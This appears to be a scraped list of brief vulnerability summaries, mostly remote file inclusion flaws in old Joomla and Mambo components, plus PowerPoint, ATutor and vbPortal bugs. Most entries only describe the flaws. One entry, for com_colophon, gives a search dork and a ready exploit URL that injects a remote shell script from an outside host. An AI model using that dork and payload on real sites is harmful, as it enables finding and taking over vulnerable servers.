The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'pathtohomedir' parameter to '/editprofile.php'. A remote attacker can include arbitrary files from remote hosts and execute arbitrary PHP code on the vulnerable system.
The LMO - Joomla! Component is vulnerable to an input validation vulnerability due to the lack of sanitization of the $mosConfig_absolute_path variable. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to the victim. The malicious URL contains the $mosConfig_absolute_path variable set to a malicious host. When the victim visits the malicious URL, the malicious host will be executed.
Microsoft PowerPoint is prone to a remote code execution issue which may be triggered when a malformed PPT file is closed. Code execution is possible only if the number of characters in PPT file name generated by this program plus the number of characters in complete path name from which this PPT file is opened don't exceed 49 bytes and the generated PPT file must be opened from the same directory from which it was created.
The com_bayesiannaivefilter Mambo component is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter of the 'lang.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary code subject to the privileges of the webserver process. This can facilitate unauthorized access or privilege escalation.
A remote file inclusion vulnerability exists in the User Home Pages component of Raven Portal, which allows an attacker to include arbitrary files from remote locations. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter of the 'uhp_config.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. Successful exploitation will result in arbitrary remote file execution.
ATutor version 1.5.3.1 and prior are vulnerable to a blind SQL injection vulnerability in the 'links' module. An attacker can exploit this vulnerability to disclose admin credentials.
This exploit allows an attacker to execute arbitrary commands on a vulnerable vbPortal 3.0.2 <= 3.6.0 Beta 1 system. The vulnerability is due to insufficient sanitization of user-supplied input to the 'vbblang' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing shell metacharacters to the vulnerable system.
A remote include vulnerability exists in the Mambo Component mambatstaff. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the mosConfig_absolute_path parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.
This bug allows a remote attacker to execute commands via Remote File Inclusion (RFI). The vulnerable page is admin.colophon.php, which contains a require_once statement that can be exploited by adding a malicious URL in the mosConfig_absolute_path parameter. The dork for this vulnerability is inurl:com_colophon and the exploit URL is http:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?
Mambo Gallery Manager v095.r3 is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter in the 'help.mgm.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary code on the vulnerable system.
Services By CQR